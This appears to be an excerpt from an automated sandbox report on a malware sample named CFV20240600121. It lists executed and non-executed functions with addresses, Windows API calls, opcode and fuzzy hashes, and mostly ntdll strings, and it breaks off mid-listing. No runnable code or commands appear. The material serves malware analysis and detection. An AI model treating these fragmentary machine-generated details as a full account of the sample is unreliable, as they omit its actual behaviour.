94907->94881 94907->94882 94912 42a6e3 94908->94912 94911 42afb3 NtClose 94911->94907 94913 42a700 94912->94913 94916 14135c0 LdrInitializeThunk 94913->94916 94914 41aa0d 94914->94911 94916->94914 94919 4181ad 94917->94919 94918 41861b 94918->94891 94919->94918 94925 413da3 94919->94925 94921 4182ba 94921->94918 94922 42ce63 RtlFreeHeap 94921->94922 94923 4182d2 94922->94923 94923->94918 94924 42b363 ExitProcess 94923->94924 94924->94918 94932 413dbf 94925->94932 94926 413f13 94926->94921 94927 413edf 94927->94926 94935 41ad43 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 94927->94935 94929 413ef3 94929->94926 94936 41ad43 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 94929->94936 94931 413f09 94931->94921 94932->94926 94932->94927 94934 413803 LdrInitializeThunk 94932->94934 94934->94927 94935->94929 94936->94931 94937 418838 94938 42afb3 NtClose 94937->94938 94939 418842 94938->94939

                                        Executed Functions

                                        Function 00417633 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 60 417633-41764f 61 417657-41765c 60->61 62 417652 call 42db63 60->62 63 417662-417670 call 42e083 61->63 64 41765e-417661 61->64 62->61 67 417680-417691 call 42c523 63->67 68 417672-41767d call 42e323 63->68 73 417693-4176a7 LdrLoadDll 67->73 74 4176aa-4176ad 67->74 68->67 73->74
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176A5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 1f105407cc97f5475f162c2c368f7fff4f83cbfb92c345d432e7aba1b5b29775
                                        • Instruction ID: 49410e903ce98e45a3e9ffc17144626b0153cf374dbebee1f0f556ea5b811b95
                                        • Opcode Fuzzy Hash: 1f105407cc97f5475f162c2c368f7fff4f83cbfb92c345d432e7aba1b5b29775
                                        • Instruction Fuzzy Hash: BD0171B1E0020DBBDF10DBE5DC82FDEB3B89B54308F00819AE90897240FA35EB548B95
                                        Function 0042AFB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 80 42afb3-42afef call 4047f3 call 42c043 NtClose
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 2e13aa1011194f2d93aab32996f397384c21cab21486b62390f9442c5dc7b679
                                        • Instruction ID: 7056048883b40576f78ce53df64e256d66ea8c9b649b56fc772ed0dddd8b899f
                                        • Opcode Fuzzy Hash: 2e13aa1011194f2d93aab32996f397384c21cab21486b62390f9442c5dc7b679
                                        • Instruction Fuzzy Hash: 60E04672200614BBD220AB6AEC41F9B776CDBC5714F00441AFA08AB242CB75BA0187B4
                                        Function 01412B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 94 1412b60-1412b6c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 41c0a85887bff693f0805b79f594e6f1265e67860f30ebfa9160f9170805ed5b
                                        • Instruction ID: 896047e503fc7babdda34c61adc5cb1e08629b79aa6d6656b40146f05a6ef245
                                        • Opcode Fuzzy Hash: 41c0a85887bff693f0805b79f594e6f1265e67860f30ebfa9160f9170805ed5b
                                        • Instruction Fuzzy Hash: 619002612024110341057158441561A404A9BF0201B95C022E1014591DCA3589D16225
                                        Function 01412DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 96 1412df0-1412dfc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 17ac63bc0360fff4026dda7b9cee5d7590af51dd09b61e95a4486d56edfada29
                                        • Instruction ID: f1a4fd6390e33f0c2a86ceb64612873f5937781f025aaf7464e4a2bdf3428dda
                                        • Opcode Fuzzy Hash: 17ac63bc0360fff4026dda7b9cee5d7590af51dd09b61e95a4486d56edfada29
                                        • Instruction Fuzzy Hash: 5790023120141513D1117158450570B00499BE0241FD5C413E0424559DDB668A92A221
                                        Function 01412C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 95 1412c70-1412c7c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 240371e19ef3b01227155a9324b9da91f5729472224c9975292bd835d7d8ddbd
                                        • Instruction ID: e4d4aad97d54eb28dff7387d36208dabd920312f8867fd4be62cad44554950d2
                                        • Opcode Fuzzy Hash: 240371e19ef3b01227155a9324b9da91f5729472224c9975292bd835d7d8ddbd
                                        • Instruction Fuzzy Hash: 9E90023120149902D1107158840574E00459BE0301F99C412E4424659DCBA589D17221
                                        Function 014135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 97 14135c0-14135cc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3d80df76651713fff50e41673eb8fae0d1efaa5f587d9f2455d8321bbf9fb302
                                        • Instruction ID: 33f60ad1dc0912bf0940c509c302786380f1e896608df5785ac9ff8924f7718c
                                        • Opcode Fuzzy Hash: 3d80df76651713fff50e41673eb8fae0d1efaa5f587d9f2455d8321bbf9fb302
                                        • Instruction Fuzzy Hash: 9A90023160551502D1007158451570A10459BE0201FA5C412E0424569DCBA58A9166A2
                                        Function 00413BD6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: _R39449$_R39449
                                        • API String ID: 0-3332756889
                                        • Opcode ID: 76f0e444f82b3710697edbd90bae0ffc89848b8573a18a20c5745bde5637fc81
                                        • Instruction ID: f6dd290d98645640e89bed43f55bbd26daf91bd6838ac9081b5080bdc64fb736
                                        • Opcode Fuzzy Hash: 76f0e444f82b3710697edbd90bae0ffc89848b8573a18a20c5745bde5637fc81
                                        • Instruction Fuzzy Hash: 69319973A012087BDB01DEA59CC1EDEFBBDDF51664B04415AF948EB202D2399F0687E5
                                        Function 00413C7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 18 413c7b-413c95 19 413c9d-413cea call 42d913 call 417633 call 404763 call 424283 18->19 20 413c98 call 42cf03 18->20 29 413d0a-413d10 19->29 30 413cec-413cfb PostThreadMessageW 19->30 20->19 30->29 31 413cfd-413d07 30->31 31->29
                                        APIs
                                        • PostThreadMessageW.USER32(_R39449,00000111,00000000,00000000), ref: 00413CF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: _R39449$_R39449
                                        • API String ID: 1836367815-3332756889
                                        • Opcode ID: 063ad8c92660b486ea9efb336491cdefdfd82b25f8bc22fa4316de7180e6aafa
                                        • Instruction ID: 974c52a57183bda7a8a1f2c1f2bf9f2f24943fd38723bd57de6744b27a2586dc
                                        • Opcode Fuzzy Hash: 063ad8c92660b486ea9efb336491cdefdfd82b25f8bc22fa4316de7180e6aafa
                                        • Instruction Fuzzy Hash: 7D01A1B2D0021C7ADB11AAE19C81DEFBF7CDF51698F458159FA04A7241D2784F068BA5
                                        Function 00413C83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 32 413c83-413c95 33 413c9d-413cea call 42d913 call 417633 call 404763 call 424283 32->33 34 413c98 call 42cf03 32->34 43 413d0a-413d10 33->43 44 413cec-413cfb PostThreadMessageW 33->44 34->33 44->43 45 413cfd-413d07 44->45 45->43
                                        APIs
                                        • PostThreadMessageW.USER32(_R39449,00000111,00000000,00000000), ref: 00413CF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: _R39449$_R39449
                                        • API String ID: 1836367815-3332756889
                                        • Opcode ID: cd7b202c30f52c945af617946cbaf14116d0e1e4c5be4d256f5695cd6d4b9e2e
                                        • Instruction ID: e29c6e63a7e43b07badeb503a94c0062d1746e1c2ff060726e15441b93849f50
                                        • Opcode Fuzzy Hash: cd7b202c30f52c945af617946cbaf14116d0e1e4c5be4d256f5695cd6d4b9e2e
                                        • Instruction Fuzzy Hash: 0101C4B1D0011C7ADB11AAE29C81CEFBB7CDF41698F418059FA04A7241D6784F0687F5
                                        Function 0042B313 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 55 42b313-42b354 call 4047f3 call 42c043 RtlFreeHeap
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B34F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: cA
                                        • API String ID: 3298025750-2872761854
                                        • Opcode ID: 158fc4165e37fcc9b790d2039f650beb677f5d77a668fd986fc342788da0459c
                                        • Instruction ID: 9d5504104b25ae33ca202a0e8d3934518e9765f913c10e5db51da1feffaa161b
                                        • Opcode Fuzzy Hash: 158fc4165e37fcc9b790d2039f650beb677f5d77a668fd986fc342788da0459c
                                        • Instruction Fuzzy Hash: 86E06D71204204BBD610EF59EC81EDB33ACEFC5710F004419FA08A7242CB71B9108AB4
                                        Function 0042B2C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 75 42b2c3-42b304 call 4047f3 call 42c043 RtlAllocateHeap
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,0041DDB5,?,?,00000000,?,0041DDB5,?,?,?), ref: 0042B2FF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 81cd070181d29d65e2722f3f31313ea73596597a67a9e1dc53fca6e5ffdb0074
                                        • Instruction ID: c768d731d452570a0f81b75752afe643daa440d5795f0c663d31ce9ddf2475e6
                                        • Opcode Fuzzy Hash: 81cd070181d29d65e2722f3f31313ea73596597a67a9e1dc53fca6e5ffdb0074
                                        • Instruction Fuzzy Hash: C1E06D712003047BC610EF99EC41F9B73ACEFC5714F00441AF908A7242D770B91087B8
                                        Function 0042B363 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 85 42b363-42b39c call 4047f3 call 42c043 ExitProcess
                                        APIs
                                        • ExitProcess.KERNEL32(?,00000000,?,?,3AF16345,?,?,3AF16345), ref: 0042B397
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 501010166d88e8cb47220a401c727907443c357ee8ce9e1c4b2daa628c666fed
                                        • Instruction ID: a4d5aaf13ecf5a84f5f2e8553bd537af2ddfbb2efcf1c79254879d6b6ed7f03a
                                        • Opcode Fuzzy Hash: 501010166d88e8cb47220a401c727907443c357ee8ce9e1c4b2daa628c666fed
                                        • Instruction Fuzzy Hash: ADE086722002147BC620EB5AEC41F9B776CDFC5714F50841AFA0C67282C675BA0187F4
                                        Function 01412C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 90 1412c0a-1412c0f 91 1412c11-1412c18 90->91 92 1412c1f-1412c26 LdrInitializeThunk 90->92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 922021b49d4cb36dfe2b4c7bef472d1bf340ca4569a50c07c5320b1431c55581
                                        • Instruction ID: b13324d9eebbab6f888d39b816fc6d4b3ed3a7edbd475c1cf64b819b1cad7d0a
                                        • Opcode Fuzzy Hash: 922021b49d4cb36dfe2b4c7bef472d1bf340ca4569a50c07c5320b1431c55581
                                        • Instruction Fuzzy Hash: 25B09B719015D6C6DA11E7644609B1B79407BE0701F65C063D3034653F4778C1D1E275

                                        Non-executed Functions

                                        Function 01452349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-2160512332
                                        • Opcode ID: 3fbba933b92ea922fa0927f7588075348a37b1f02617d127acd46386e64deb71
                                        • Instruction ID: a26dacfa5f3d326fc82abeb4ce37fb71181544758408d30dc0c5614299720216
                                        • Opcode Fuzzy Hash: 3fbba933b92ea922fa0927f7588075348a37b1f02617d127acd46386e64deb71
                                        • Instruction Fuzzy Hash: 00926C71604342EBE761CE29C880F6BB7E8BB84754F04491FFA9597362D7B0E845CB92
                                        Function 01408620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                        Download Yara Rule
                                        Strings
                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014454CE
                                        • Invalid debug info address of this critical section, xrefs: 014454B6
                                        • Critical section address, xrefs: 01445425, 014454BC, 01445534
                                        • Address of the debug info found in the active list., xrefs: 014454AE, 014454FA
                                        • Critical section address., xrefs: 01445502
                                        • Critical section debug info address, xrefs: 0144541F, 0144552E
                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0144540A, 01445496, 01445519
                                        • Thread identifier, xrefs: 0144553A
                                        • 8, xrefs: 014452E3
                                        • corrupted critical section, xrefs: 014454C2
                                        • double initialized or corrupted critical section, xrefs: 01445508
                                        • undeleted critical section in freed memory, xrefs: 0144542B
                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01445543
                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014454E2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                        • API String ID: 0-2368682639
                                        • Opcode ID: dcecc9e685072b992a398ec2d34585081f8742e70629bb0282d97c80b702d5c8
                                        • Instruction ID: 08f75aabbdf276c2771346786d18c37ae844db4ca459b6649c1987ac72415f33
                                        • Opcode Fuzzy Hash: dcecc9e685072b992a398ec2d34585081f8742e70629bb0282d97c80b702d5c8
                                        • Instruction Fuzzy Hash: FA819171A01359EFEF60CF99C885BAEBBB9BB04714F20415AF608BB760D375A941CB50
                                        Function 014029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014422E4
                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01442412
                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01442624
                                        • @, xrefs: 0144259B
                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01442506
                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01442498
                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014425EB
                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0144261F
                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01442602
                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01442409
                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014424C0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                        • API String ID: 0-4009184096
                                        • Opcode ID: 318a9cb31ad41e5ecec2a157f7b50dd41c5e3995e0bdccf5bfbe5b1d012aed42
                                        • Instruction ID: f099ce83a805065717a5ad3ff6dcbc8c3c2f6a39a4c4e16b1beebd951cbae9a4
                                        • Opcode Fuzzy Hash: 318a9cb31ad41e5ecec2a157f7b50dd41c5e3995e0bdccf5bfbe5b1d012aed42
                                        • Instruction Fuzzy Hash: FA0281F1D042299BEB21DB55CC84FDAB7B8AB54304F0041EBE60DA7291E7B09E85CF59
                                        Function 01478B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                        • API String ID: 0-2515994595
                                        • Opcode ID: 2bc7526878e919d0ce46a40f3ba6447920bc24c1f08182f9c85b283f168af215
                                        • Instruction ID: de8e9884fd75751ab79f4d4ea345abe4228d432e9acd7ad3d2def25ae0a36da4
                                        • Opcode Fuzzy Hash: 2bc7526878e919d0ce46a40f3ba6447920bc24c1f08182f9c85b283f168af215
                                        • Instruction Fuzzy Hash: 5A51BF716043129FD329CF198889BEBBBECFF94644F54491EE959C3260E770D609C792
                                        Function 01480274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                        • API String ID: 0-1700792311
                                        • Opcode ID: 2e77036aba87f8be474ddb6654da575d1c8b7f47ab54d0dac109c8d7d8d4fb41
                                        • Instruction ID: add9e77f2061baaef9865cfc49c1c10f8a3106eb6fd8064b85430805a75fc4f5
                                        • Opcode Fuzzy Hash: 2e77036aba87f8be474ddb6654da575d1c8b7f47ab54d0dac109c8d7d8d4fb41
                                        • Instruction Fuzzy Hash: C7D1CE31520685DFDB22EF6CC451AAEBBF1FF59B18F08805EE445AB362C7349949CB20
                                        Function 014589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                        Download Yara Rule
                                        Strings
                                        • AVRF: -*- final list of providers -*- , xrefs: 01458B8F
                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01458A67
                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01458A3D
                                        • HandleTraces, xrefs: 01458C8F
                                        • VerifierDlls, xrefs: 01458CBD
                                        • VerifierDebug, xrefs: 01458CA5
                                        • VerifierFlags, xrefs: 01458C50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                        • API String ID: 0-3223716464
                                        • Opcode ID: 5f854633b51815f329c98e6ca5e1d105c62a39b32539144e7b1afe39d7d56c10
                                        • Instruction ID: 90412176af43f7938b7994dba62d09e585d190edd2ff190f9996dee4b25c0254
                                        • Opcode Fuzzy Hash: 5f854633b51815f329c98e6ca5e1d105c62a39b32539144e7b1afe39d7d56c10
                                        • Instruction Fuzzy Hash: 54910171601712EFD7A2DF2A9880B5B77E9AB64B18F04041EFE416B372DB30AC058B95
                                        Function 013DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                        • API String ID: 0-1109411897
                                        • Opcode ID: 0f69bf0c5221dab67c4c52b254cf97bd9881dce0cc75050f47f626247355e928
                                        • Instruction ID: f23da95b993e63d5dce3af014b34249cc1484c03b33ea5852813f3070c2418ff
                                        • Opcode Fuzzy Hash: 0f69bf0c5221dab67c4c52b254cf97bd9881dce0cc75050f47f626247355e928
                                        • Instruction Fuzzy Hash: D4A24D75A056298FDB64CF19DC887A9BBB5BF89308F1442EAD50DA7360DB349E85CF00
                                        Function 014063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-792281065
                                        • Opcode ID: 93742a5fe735053eefbae4e7f7665770c4b5a9a2589d6e0eda87051939c19713
                                        • Instruction ID: 768c0d012a7ee43dc191bb3608d79ff910e4c51655e27a75533b60aa27d71ff2
                                        • Opcode Fuzzy Hash: 93742a5fe735053eefbae4e7f7665770c4b5a9a2589d6e0eda87051939c19713
                                        • Instruction Fuzzy Hash: 06913670B013119BEB26DF1AE849BAA7BA1BF10B58F1A413FE5016B7F1D7705802C794
                                        Function 013C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                        Download Yara Rule
                                        Strings
                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01429A01
                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01429A2A
                                        • apphelp.dll, xrefs: 013C6496
